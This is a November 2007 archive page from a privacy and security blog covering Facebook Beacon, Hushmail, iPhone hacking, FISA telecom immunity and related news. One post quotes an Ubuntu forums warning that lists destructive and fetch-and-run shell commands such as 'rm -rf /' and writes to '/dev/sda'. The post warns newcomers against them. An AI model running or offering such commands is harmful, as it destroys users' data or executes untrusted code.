« October 2007 | Main | December 2007 »
November 30, 2007
'Tis the Season for Self-Serving Productivity Surveys
Times Online: Top 14 spurious productivity surveys:
"Last week I wrote about workplace productivity, and claimed barely a week passes without someone somewhere publishing an outlandish, pr-inspired survey supposedly exposing a way in which workers waste time. Eager to maximise my own productivity, and eager to minimise the workplace productivity of timesonline readers, I kept a record of the weirdest ones as I did my research, and am now delighted to present a list of the top 14 most ridiculous productivity surveys, as presented in the press, in reverse order of spuriousness. Somehow '14' seems an apt number for an arena that routinely sees the production of bizarrely precise estimates."
All the little Orwells in the security industry thrive on "foo will cost you n dollars per year in lost bar" studies to show that your boss needs some new tool to better control what you do or look at on the job. Since it's the holiday season, the annual "People shopping online at work will cost their employers ..." studies are rolling out as a reason for employers to deploy filters and otherwise do their part to create an over-regulated, overbearing, IT panopticon.
Posted by mhall at 6:05 PM | Add Comment
Facebook Tones Down Beacon, MoveOn Declares Victory
Facebook Update on Changes to Beacon:
"We appreciate feedback from all Facebook users and made some changes to Beacon in the past day. Users now have more control over the stories that get published to their Mini-Feed and potentially to their friends' News Feeds.
"Here's how the Beacon changes work:
Stories about actions users take on external websites will continue to be presented to users at the top of their News Feed the next time they return to Facebook. These stories will now always be expanded on their home page so they can see and read them clearly.
Users must click on "OK" in a new initial notification on their Facebook home page before the first Beacon story is published to their friends from each participating site. We recognize that users need to clearly understand Beacon before they first have a story published, and we will continue to refine this approach to give users choice.
If a user does nothing with the initial notification on Facebook, it will hide after some duration without a story being published. When a user takes a future action on a Beacon site, it will reappear and display all the potential stories along with the opportunity to click "OK" to publish or click "remove" to not publish.
Users will have clear options in ongoing notifications to either delete or publish. No stories will be published if users navigate away from their home page. If they delay in making this decision, the notification will hide and they can make a decision at a later time.
Clicking the "Help" link next to the story will take users to a full tutorial that explains exactly how Beacon works, with screenshots showing each step in the process."
The NYT follows up:
"Declaring victory, MoveOn.org Civic Action's spokesman, Adam Green, said in a statement: 'If Facebook changes their policy so that no private purchases made on other websites are displayed publicly on Facebook without a user's explicit permission, that would be a huge step in the right direction — and would say a lot about the ability of everyday Internet users to band together to make a difference.'"
"But Facebook did not completely address critics' concerns. Specifically, it still is not allowing users to completely bow out of Beacon. Critically, this means that if you do something on a Facebook partner site, Facebook still gets information about your actions, whether you like it or not."
So go get the Firefox plugin and solve that, too.
Posted by mhall at 4:53 PM | Add Comment
November 29, 2007
Caveat Newbie: Ubuntu Forums Dealing With Malicious Heels
The Ubuntu forums are having trouble with malicious heels:
"We've recently had an increase in the number of dangerous commands being posted on the forums. Don't pretend you don't know what I mean -- commands that cause massive damage or disruption to the user's computer.
[...]
"I'd also like to remind users to be cautious when someone tells you to run some command or download some script as a solution to your problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained to you and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages)."
Some of the commands they're warning against:
rm -rf / rm -rf . rm -rf * any_command > /dev/sda dd if=something of=/dev/sda wget http://some_place/some_file sh ./some_file
And there are some more subtle ones on the list, too, though not by much.
(via Lifehacker)
Posted by mhall at 1:42 PM | Add Comment
November 28, 2007
Zero-Day Exploits Down. So what?
internetnews.com: SANS: Zero-Day Exploits on The Decline:
"Ed Skoudis, who serves as course director for SANS Incident Handling and Hacker Exploits, explained during the conference call why he thinks zero-day is on the decline.
"'One of the reasons is that bad guys don't have to use them (zero day),' said Skoudis, who also founded information security consultancy Intelguardians.
"For example, he said, the Storm worm propagates itself though users clicking on an e-mail link, and does not require a zero-day exploit to function.
"'When simple techniques work, there is no need to unfurl zero-days,' Skoudis said. 'Attackers can just save them for more targeted attacks.'"
Which is why all the braying about which operating system is more or less secure is bad for people who aren't reading the headlines: No operating system can protect you from yourself.
Posted by mhall at 8:10 PM | Add Comment
November 27, 2007
Ten Secure Browsing Extensions for Firefox
Linux.com: Ten Firefox extensions to keep your browsing private and secure:
"Most people lock their doors and windows, use a paper shredder to protect themselves from identity theft, and install antivirus software on their computers. Yet they routinely surf the Internet without giving a second thought to whether their browser is secure and their personal information safe. Unfortunately, it's easy for someone with nefarious intentions to use a Web site to glean data from -- or introduce spyware to -- your computer. Even worse, sometimes all you have to do is randomly click on a site to have your data probed in a most unwelcome way.
"Mozilla Firefox has several security settings you can adjust via the Preferences pane, but there are also more than 150 privacy and security extensions you can add as well. They are easy to install and take little time to set up; some even work automatically after you restart your browser. Let's have a look at some of the most popular and most useful."
This isn't a bad list, but there are a few things worth noting on the picks:
As a reader in that article's comments points out, TrackMeNot has issues:
"[...] some of the program's searches are worse than yours. The dictionary includes: HIV, atomic, bomb, bible, bibles, bombing, bombs, boxes, choke, choked, chokes, choking, chain, crackers, empire, evil, erotics, erotices, fingers, knobs, kicking, harier, hamster, hairs, legal, letterbomb, letterbombs, mailbomb, mailbombing, mailbombs, rapes, raping, rape, raper, rapist, virgin, warez, warezes, whack, whacked, whacker, whacking, whackers, whacks, pistols
"Does anyone reall [sic] think that searches on 'erotic rape,' 'mailbombing bibles,' and 'choking virgins' will make their legitimate searches less noteworthy? And four, it wastes a whole lot of bandwidth. A query every twelve seconds translates into 2,400 queries a day, assuming an eight-hour workday. A typical Google response is about 25K, so we're talking 60 megabytes of additional traffic daily. Imagine if everyone in the company used it.
"I suppose this kind of thing would stop someone who has a paper printout of your searches and is looking through them manually, but it's not going to hamper computer analysis very much. Or anyone who isn't lazy. But it wouldn't be hard for a computer profiling program to ignore these searches."
Secure Password Generator isn't a bad idea, either, but I'd suggest it's not the best idea. I wrote about Password Composer for Practically Networked. It has the benefit of generating random passwords that don't require anything more than remembering a master password. Presumably you can keep one password in your head without having to write it down or divulge it to anyone.
The Petname extension seems clever, too:
"The petname tool will be enabled anytime you visit a site using SSL strong encryption. Initially, the petname tool will display the text 'untrusted'. If you decide to form a relationship with the site, overwrite this text with a reminder note describing the new relationship. The petname tool will remember this reminder note and display it every time you visit the site. Be sure to always check that the petname tool is displaying the expected reminder note before sending personal information to a site. If you have the misfortune to land on a spoof site, you'll know it because the petname tool will be displaying the text 'untrusted', instead of your expected reminder note."
It's a poor man's two-factor authentication, but two-factor authentication doesn't work with complete reliability even when it's not being done by a poor man. I don't know if I'd want the added layer of complexity this add-on introduces.
(via Lifehacker, where there are a few good additional comments on the problems with Tor routers)
Posted by mhall at 5:27 PM | Add Comment
Facebook Backlash Watch: Creepy, Clingy, Not Interested In Saying Goodbye
I think it's safe to say Facebook has managed to achieve an important stage in the lifecycle of any Web success story: The cool kids have decided they hate it. Maybe not any of the cool kids you and I know face to face, who probably still like it. Just that nebulous collection of Cool Kids out there on the 'net who usually start sniffing with disdain once the profit motive manifests. And in Facebook's case, it has.
So here are three Facebook Backlash Watch entrants:
CNET: MoveOn to Facebook: We caught you red-handed :
"Last week, a feud began to brew between leftist activist group MoveOn.org and social-networking site Facebook concerning its 'Beacon' advertisements, which broadcast information about users' activity on third-party partner sites to their friends' Facebook newsfeeds. According to MoveOn, it's a violation of user privacy because there's no way to universally opt out of Beacon ads. Facebook retorted, and the argument has turned into a legitimate debate over how far is really too far when it comes to sharing information about members' activity.
"Now, MoveOn is poised to launch a new offensive against Facebook, claiming that early screenshots of Beacon posted by TechCrunch indicated that the advertising application once included a 'global opt-out' that would allow members to block it entirely. According to MoveOn, this never made it into the final version, and the organization--which has created a petition and a Facebook group to raise awareness of what it sees as a hot-button issue--wants to know why.
Cory Doctorow: How Your Creepy Ex-Co-Workers Will Kill Facebook:
"In the real world, we don't articulate our social networks. Imagine how creepy it would be to wander into a co-worker's cubicle and discover the wall covered with tiny photos of everyone in the office, ranked by 'friend' and 'foe,' with the top eight friends elevated to a small shrine decorated with Post-It roses and hearts. And yet, there's an undeniable attraction to corralling all your friends and friendly acquaintances, charting them and their relationship to you. Maybe it's evolutionary, some quirk of the neocortex dating from our evolution into social animals who gained advantage by dividing up the work of survival but acquired the tricky job of watching all the other monkeys so as to be sure that everyone was pulling their weight and not napping in the treetops instead of watching for predators, emerging only to eat the fruit the rest of us have foraged.
"Keeping track of our social relationships is a serious piece of work that runs a heavy cognitive load. It's natural to seek out some neural prosthesis for assistance in this chore. My fiancee once proposed a 'social scheduling' application that would watch your phone and email and IM to figure out who your pals were and give you a little alert if too much time passed without your reaching out to say hello and keep the coals of your relationship aglow. By the time you've reached your forties, chances are you're out-of-touch with more friends than you're in-touch with: Old summer-camp chums, high-school mates, ex-spouses and their families, former co-workers, college roomies, dot-com veterans... Getting all those people back into your life is a full-time job and then some.
"You'd think that Facebook would be the perfect tool for handling all this. It's not. For every long-lost chum who reaches out to me on Facebook, there's a guy who beat me up on a weekly basis through the whole seventh grade but now wants to be my buddy; or the crazy person who was fun in college but is now kind of sad; or the creepy ex-co-worker who I'd cross the street to avoid but who now wants to know, 'Am I your friend?' yes or no, this instant, please."
And having winced over the bitter, wince some more over the bitterly funny as we go back to July, when Steven Mansour decided it was time to kill his Facebook profile:
"It's one thing when I choose to leave a web service (Flickr, Youtube) because I don't want them profiting from my content. It's another when they prevent me from leaving. Is this really the only choice we have left? Shitty web companies vs. shitty web companies that keep and distribute your personal data ad infinum even when you request your account to be closed?
"As it turns out, I had to 'contact' facebook and ask them how to delete my account, only to find out that I have to manually delete every single minifeed item, friend, post, wall writing, etc by hand, one-by-one, or else they will refuse to close your account. When you're a member of the Internet High Society as I am, you find that you have thousands of these items to delete."
I spent yesterday overwriting all the data in my profile with a lot of nothing, then dropping all my friends, networks, apps and groups. I think. The main point was to get rid of the personally identifiable information. Maybe I'll try to delete the account altogether and report back.
(thanks, Ed)
Previously:
- Do YOU Understand Your Social Networking Site's Privacy Policy?
- Law Prof: New Facebook Ad System May Be Illegal
- Man Uses Facebook Address Book Tool, Goes to Jail
- Facebook Offers Warning Period Before Letting the Spiders In
Posted by mhall at 2:53 AM | Add Comment
November 26, 2007
Squashed Malicious Attachment Bug From Tiger's Mail is Back for Leopard
Heise Security -- Apple Mail in Leopard with the same old error :
"In March 2006 Apple defused a security problem in Apple Mail that made it possible to inject disguised malignant code. In Leopard, the patch was apparently forgotten. This means that you can inadvertently start an executable by double-clicking a mail attachment that looks like a JPEG image file."
Jeez.
(via Daring Fireball)
Posted by mhall at 3:19 PM | Add Comment
November 21, 2007
Poll: 40 Percent of Americans Say Privacy Rights "Important" in 2008 Election
MSNBC: Is Obama the privacy candidate?:
"Americans think Barack Obama is the Democrat most likely to advance their privacy rights and that Rudy Giuliani is the least privacy-sensitive of the top three Republican candidates, a new survey suggests.
"The telephone poll of 600 adults, conducted by private research firm The Ponemon Institute, also found that 40 percent of Americans say protection of privacy rights is either important or very important in determining preference for the next presidential election.
"Asked to select both the Democratic and Republican candidate they believe is most likely to 'advance your privacy rights,' respondents preferred Obama over Hillary Clinton and John Edwards by nearly a 2-to-1 ratio, with 43 percent naming Obama compared to 25 percent for Edwards and 23 percent for Clinton."
(via)
Posted by mhall at 3:26 PM | Add Comment
November 20, 2007
Criminals Exploit Unused Yahoo IP to Reel In Google Users
internetnews.com: Hackers Abuse Domain-Name Trust:
"In the case of Yahoo, security firm Finjan said hackers exploited an unused IP address within Yahoo's hierarchy and used that as the domain address behind a forged Google Analytics domain name. This fooled the Web-filtering products into believing a person was going to a highly trusted Yahoo domain. The victims never knew they were on a malicious Web site, and neither did the security mechanisms on the network.
"'They managed to resolve the domain name to an IP address owned by Yahoo. How they added an address into a DNS server to appear to be an IP address owned by Yahoo is unknown,' Yuval Ben-Itzhak, CTO of Finjan, told InternetNews.com. He added that Yahoo, while responsive and quick to shut down the compromised address, did not disclose exactly what equipment was behind the compromised IP address.
"Ben-Itzhak thinks something in the server was broken that enabled the bad guys to push that content down to users without Yahoo knowing. He said that's a flaw in social networks."
The flaw being that they allow people to upload stuff, including malicious code. But it's not clear from this article where social networking sites fit in.
Posted by mhall at 7:07 PM | Add Comment
Hushmail Says Any Mail Using Its Service Is Compromisable
Hushmail To Warn Users of Law Enforcement Backdoor :
"Hushmail responds only to court orders from the Supreme Court of British Columbia that target specific, named accounts, according to Hushmail's CTO Brian Smith. In the steriod case, the Drug Enforcement Agency used a mutual legal assistance treaty to get a Canadian court order, according to court documents.
"But when the company gets a court order, 'we are required to do everything in our power to comply with the law,' according to an updated explanation of Hushmail's security.
"That everything seems to include sending a rogue Java applet to targeted users that will then report the user's passphrase back to Hushmail, thus giving the feds access to all stored emails and any future emails sent or received."
Hushmail itself points out what one might think pretty quickly, were one to go off shopping for something without a +5 Applet of Weaseling:
"PGP Desktop and GnuPG are not web-based services. They install as software on your computer. Installed software is different from a web-based service in that you don't rely on the owner of the website to run the software correctly. You take on that responsibility yourself. If used correctly, both PGP and GnuPG can provide an extremely high level of security. When choosing your security solution, carefully weigh the convenience and ease-of-use of Hushmail against the inherent limitations of a web-based service."
Posted by mhall at 2:07 AM | Add Comment
November 19, 2007
Spyware-Using Husband Gets Four Years
So I Married a Spyware Installer:
"When Shawn Macleod of Austin, Texas, suspected his estranged wife was engaging in some kind of suspicious behavior, he installed a spyware program on her computer to monitor her e-mails and Web behavior.
"He now faces four years in jail.
"The turn of events began in August 2005 when Macleod's estranged wife Kristy reported to police that she suspected Macleod was monitoring her computer use. Detectives caught Macleod when he fell for a sting operation. The detectives then searched the computer and found SpyRecon software on it, according to a report in the Austin-American Statesman.
"SpyRecon from Secure Tactics is billed as 'the most effective and powerful Password Finding and Spy Software!' on its rather 1990s-looking homepage. The company had no contact phone number, only an e-mail address, and did not respond to queries from InternetNews.com.
"Austin police charged Macleod with unlawful interception of electronic communication, the equivalent of an illegal wiretap, which is a second-degree felony that can carry a 20-year sentence. Macleod pleaded guilty in May and was given his four-year sentence this month."
Posted by mhall at 1:32 PM | Add Comment
Security Shocker: iPhone's Exploitable
Fast Company: Hacking the iPhone:
Adam Penenberg and his editors wondered:
"... just how vulnerable is the 'Jesus Phone' to an unscrupulous hacker? Could it really be turned into a tool of espionage?
"So we purchased an iPhone for Rik Farrow, a UNIX specialist and consultant from Sedona, Arizona, and commissioned him to crack through its defenses, which he did using H D Moore's Metasploit, a popular platform for testing security systems. The result is this video, in which Farrow was able to take complete control of an iPhone and demonstrate the ability to eavesdrop on conversations, intercept voice mail and e-mail, and upload nefarious software programs. 'Physical access to an iPhone,' Farrow points out, 'is not required.' Although in Farrow's demo the Wi-Fi was turned on -- common enough for iPhone users, since AT&T's EDGE network makes Web surfing slow and laborious -- Moore says his exploit can work on EDGE, too."
However:
"... before you stash your iPhone in a drawer, realize there isn't much value in attacking smartphones a la carte. 'Taking over a PC allows you to install spam distribution servers that shoot out ads,' says Daniel Eran Dilger, a San Francisco-based technical consultant and contributing editor to AppleInsider. 'There's no real business model behind the kind of spy surveillance imagined by many writers.' And Apple (which declined to comment), in its latest patch, inoculated the iPhone against the Metasploit that Farrow used. But in the cat-and-mouse game that hackers and companies like Apple play, you can be sure someone somewhere is hatching up new schemes to hack the iPhone. Perhaps they already have."
Also, Wired writer Kim Zeller takes time to say "I told you so" to blogger Daniel Dilger, who scored big on the "blithely clueless" meter with this nugget :
"Zetter's article revolves around the idea that because the iPhone runs all its internal applications as the same root user account, users are imperiled by potential crisis. How bad is it? Windows bad, at least according to Zetter's headline.
"'Every application on the device — from the calculator on up — runs as 'root,' i.e., with full system privileges,' Zetter noted. 'As a result, a serious vulnerability in any of these applications would allow hackers to gain complete control of the device.'
"Let's make that simpler. A serious vulnerability in anything would allow hackers to gain complete control of anything."
Let's make it simpler yet: Sandbox user apps in a less privileged user account, reduce the risk of an exploited user app causing mayhem elsewhere. That model's been working for Unix for a while. Even Apple seems to kind of like it, considering, you know, OS X.
But then again, he says "There’s simply no way to run code on the iPhone, outside of its web application platform within Safari."
Which is a perfect argument for isolating applications like Safari so when they're exploited and compromised they can't do as much harm, whatever form that harm could take.
Posted by mhall at 1:30 PM | Add Comment
Wired: Spy Ruling Bodes [Well|Ill] for AT&T Eavesdropping Case
Institutionally, Wired can't make up its mind:
Analysis: Spy Ruling Bodes Well for AT&T Eavesdropping Case:
"THREAT LEVEL colleague David Kravets thinks otherwise, seeing only doom in the future for both suits, but I think his-all-but-obitituary doesn't appreciate that these two cases have always seemed doomed and yet continue to find ways to survive.
"In fact, today's ruling shows how these cases could continue to proceed, despite the omens that have been hanging over them from the start."
Analysis: Spy Ruling Portends Hurdles for AT&T Eavesdropping Case:
"The federal appellate court's decision (.pdf) Friday declaring that top secret documents were protected under the so-called state secrets privilege more than likely ends the lawsuit brought by two lawyers for suspected terrorists. The lawyers accused the government of unlawfully spying on their electronic communications without warrants.
"The decision by the 9th U.S. Circuit Court of Appeals, however, portends serious procedural hurdles in another and more far-reaching domestic spying case, one in which thousands of AT&T customers allege the telecommunications giant has funneled virtually all of its communications traffic to the National Security Agency without warrants. My THREAT LEVEL colleague Ryan Singel thinks otherwise, or does he?"
Posted by mhall at 12:57 PM | Add Comment
November 17, 2007
There Are a Lot of Free E-Mail Services ... You Should Use One
Reuters/Wired: Companies Read Employee E-Mail:
"Big Brother is not only watching but he is also reading your e-mail.
"According to a new study, about a third of big companies in the United States and Britain hire employees to read and analyze outbound e-mail as they seek to guard against legal, financial or regulatory risk.
"More than a third of U.S. companies surveyed also said their business was hurt by the exposure of sensitive or embarrassing information in the past 12 months, according to the annual study from a company specializing in protecting corporate e-mail at large businesses.
"'What folks are concerned about is confidential or sensitive information that is going out,' said Gary Steele, chief executive of Cupertino, California, company Proofpoint, which conducted the study along with Forrester Research."
I have a few dear friends who use their work e-mail address as their primary address and, frankly, it freaks me out.
Posted by mhall at 2:09 AM | Add Comment
November 16, 2007
Do YOU Understand Your Social Networking Site's Privacy Policy?
Valleywag has an entry on a gun owner who claims "her bosses asked Facebook for permission to see her profile -- which is normally set to private for everyone but her friends -- through something called Administrators Access."
The gun owner's original forum post is sort of hard to parse, but here's the part involving Facebook:
"My employer [...] is using its insurance company to pay for 'profiles' on facebook of people who are employed by my corporation."
I'm assuming that means the insurance company is collecting profiles of employees of this company who use Facebook.
That's interesting, I suppose.
The employee posts a fragment of Facebook's privacy policy to establish that what they did wasn't right. Which caused me to re-read the same policy:
"We may be required to disclose user information pursuant to lawful requests, such as subpoenas or court orders, or in compliance with applicable laws. We do not reveal information until we have a good faith belief that an information request by law enforcement or private litigants meets applicable legal standards. Additionally, we may share account or other information when we believe it is necessary to comply with law, to protect our interests or property, to prevent fraud or other illegal activity perpetrated through the Facebook service or using the Facebook name, or to prevent imminent bodily harm. This may include sharing information with other companies, lawyers, agents or government agencies."
Quick: Which laws in your state or city might be applied to getting Facebook to expose all the information in your profile? I don't know, either. It's all broad enough to be meaningless, especially when you throw in the part about Facebook protecting its interests, which could be construed to include "avoiding even frivolous litigation from an insurance company claiming it's investigating employee fraud."
Technorati Tags: privacy, social networking
Posted by mhall at 7:28 PM | Add Comment
House Passes Immunity-Free Bill
Reuters: Democrats vote to curb Bush's warrantless spying:
"The vote in the Democratic-led House was 227-189. Lawmakers voted largely along party lines.
"The bill now heads to the Senate for consideration. If it passes both chambers, the White House has threatened to veto the measure, warning it would hamper electronic spying efforts, subjecting the United States to increased risks.
"White House spokeswoman Dana Perino said the bill 'fails to give our intelligence community the tools it needs, and it fails to protect companies facing massive lawsuits for allegedly stepping up and answering the nation's call for help after the 9/11 terrorist attacks.'"
Previously:
- FISA Refit Emerges from Senate Committee with No Telco Immunity
- Finding an Alternative to Telecom Immunity
- Verizon Says It Handed Over Customer Data Hundreds of Times
- Congress Urged to Shut Up and Make With the Telco Immunity
- Updated Followup: Democrats Introduce Surveillance Bill Rewrite Sans Retroactive Telco Immunity
- Some Coverage on the Telco Spying Immunity Campaign
- Telcos Scrambling for Wiretapping Immunity
Tags: congress, privacy, wiretaps
Posted by mhall at 1:53 PM | Add Comment
November 15, 2007
FISA Refit Emerges from Senate Committee with No Telco Immunity
CNN: Committee passes surveillance laws update in face of veto threat:
"One of the key changes approved by the [Senate Judiciary] committee would make clear that the FISA law is the exclusive authority for approving warrants for electronic surveillance.
"The full Senate still must approve the bill.
"The committee Thursday also decided to let the full Senate decide the controversial question of whether to grant retroactive immunity to the telecommunications companies that cooperated with the National Security Agency's warrantless surveillance program, The Associated Press reported." [emph. mine -mph]
Reports of a "stunningly unexpected win" for civil liberties groups are nice to read, but who thinks the full Senate is going to approve anything without immunity?
Meanwhile, the bill coming out of the Intelligence Committee does have immunity written in. Senate Majority Leader Harry Reid has the prerogative to reconcile the two bills before putting them up for vote.
Previously:
- Finding an Alternative to Telecom Immunity
- Verizon Says It Handed Over Customer Data Hundreds of Times
- Congress Urged to Shut Up and Make With the Telco Immunity
- Updated Followup: Democrats Introduce Surveillance Bill Rewrite Sans Retroactive Telco Immunity
- Some Coverage on the Telco Spying Immunity Campaign
- Telcos Scrambling for Wiretapping Immunity
Tags: congress, telecoms, wiretaps
Posted by mhall at 8:53 PM | Add Comment
Apple Fixes Dopey Firewall Language
Apple: About the Mac OS X 10.5.1 Update:
In Security preferences' Firewall tab, the "Block All" option is now called "Allow Only essential services"
Previously. And previously at PracNet.
Tags: firewall, leopard, mac, security
Posted by mhall at 4:49 PM | Add Comment
November 14, 2007
Finding an Alternative to Telecom Immunity
Slate: The smart way around telecom immunity. :
"Bush lawyers have used the state secrets privilege to convince a federal appeals court to dismiss an ACLU lawsuit against the National Security Agency asking a court to declare the spying program illegal. And in the cases that have been brought against the telecoms, the administration has invoked the same privilege to argue that courts can't let the cases go forward because the telecoms would be in the unfair position of not being able to defend themselves—because, of course, the administration won't let the companies turn over the relevant documents. Retroactive immunity isn't about letting the telecoms off the hook. It's about hiding the administration's own legal claims from any judicial or public scrutiny. The administration wants to keep these cases out of court so it can cover up for itself.
"Congress can protect the telecoms without falling for this trick. In reforming FISA, Congress should enact a comprehensive law governing the state secrets privilege, one that protects our national security and also allows litigants to make their case in court. Congress figured out this sort of balancing act for criminal cases decades ago when it passed the Classified Information Procedures Act; now it's time to do the same for civil suits. We agree with the administration that state secrets should be protected at all costs. But this administration can no longer be trusted to use the privilege to protect only genuine secrets. It's instead covering up its own dubious legal reasoning—not just in the domestic surveillance cases, but also to avoid scrutiny of the torture and rendition programs at issue in the cases of Khalid El-Masri and Maher Arar. Someone other than the executive must be able to review whether the executive is abusing the privilege."
Oh ... you wanted a punch-line, too?
"The ongoing FISA debate gives Congress an opportunity to step in where the court has failed to. If Congress is serious about allowing the telecoms to defend themselves, while holding the administration accountable, fixing the state secrets privilege is the place to start. Then, it'll be time for the administration to state its secrets."
That's a mighty big "if."
Half of Congress is all for "allowing the telecoms to defend themselves," and not at all for "holding the administration accountable." And the other half is a mixed bag we can expect will not push for any sort of confrontation on the issue.
Prediction: Arguments like this become cover for immunity, but the second half ... the part about reforming oversight to the point these kinds of abuses don't happen again ... dies quietly.
Tags: congress, privacy, telecoms, wiretaps
Posted by mhall at 7:26 PM | Add Comment
Europe Puts Up a Roadblock for Google/DoubleClick
NYT: Google Hits European Hurdle on DoubleClick Deal:
"European regulators refused Tuesday to approve Google’s $3.1 billion purchase of the Internet advertising company DoubleClick. They ordered a review of the deal amid opposition from rivals, publishers and consumer groups.
"The European Commission, the administrative arm of the European Union, which rules on antitrust issues for the 27 member nations, said the merger raised concerns about competition and required a more thorough review of its effects on the Internet advertising business."
Further down, though:
"Many of the increasing objections filed with the commission in recent weeks centered on privacy issues, rather than on the ways that a Google-DoubleClick merger would affect competition. A commission spokesman said that by law the commission could not base an antitrust decision on anything but the market impact.
"An umbrella group of European consumer organizations, BEUC, complained to the commission as early as July that a takeover of DoubleClick would damage privacy rights and limit Internet content. Others joining the complaint included the European Publishers Council and the World Federation of Advertisers."
Technorati Tags: advertising, google, privacy
Posted by mhall at 7:20 PM | Add Comment
Leave It to Canada to Explain Privacy and Social Networks Well
The Office of the Privacy Commissioner of Canada has released a video about privacy and social networks.
My favorite part of the whole thing is its tone, because it doesn't give in to the urge to grab the viewer by the lapels and START EXPLAINING HOW COMPLEX AND SCARY THIS ALL IS.
Instead, the narrator spells things out in an affable and calm voice that hits the highlights, pulls no punches about the underlying corporate value of social networking services, and explains the ways in which your information can be used. And there are attractive charts in soothing colors.
Privacy could use more advocacy like this.
via PogoWasRight
Posted by mhall at 7:02 PM | Add Comment
November 13, 2007
Also, Twittering "Told boss home sick ... sucker" is probably a bad idea.
Valleywag: Bank intern busted by Facebook:
"Kevin Colvin, an intern at Anglo Irish Bank's North American arm, was busted when he told his manager, Paul Davis, that he'd miss work due to what colleagues took to be a "family emergency". Davis turned up the photo above, freshly posted to Facebook from the Halloween party Colvin apparently missed work to attend, and attached it to his reply, copying the rest of the office as he did it."
Follow that link ... the picture is a hoot.
Posted by mhall at 6:57 PM | Add Comment
Yahoo Settles Case With Chinese Writers
Wired: Yahoo Settles with Chinese Writers:
"Terms of the settlement weren't disclosed. But a source at Yahoo said the company has been 'working with the families, and we're working with them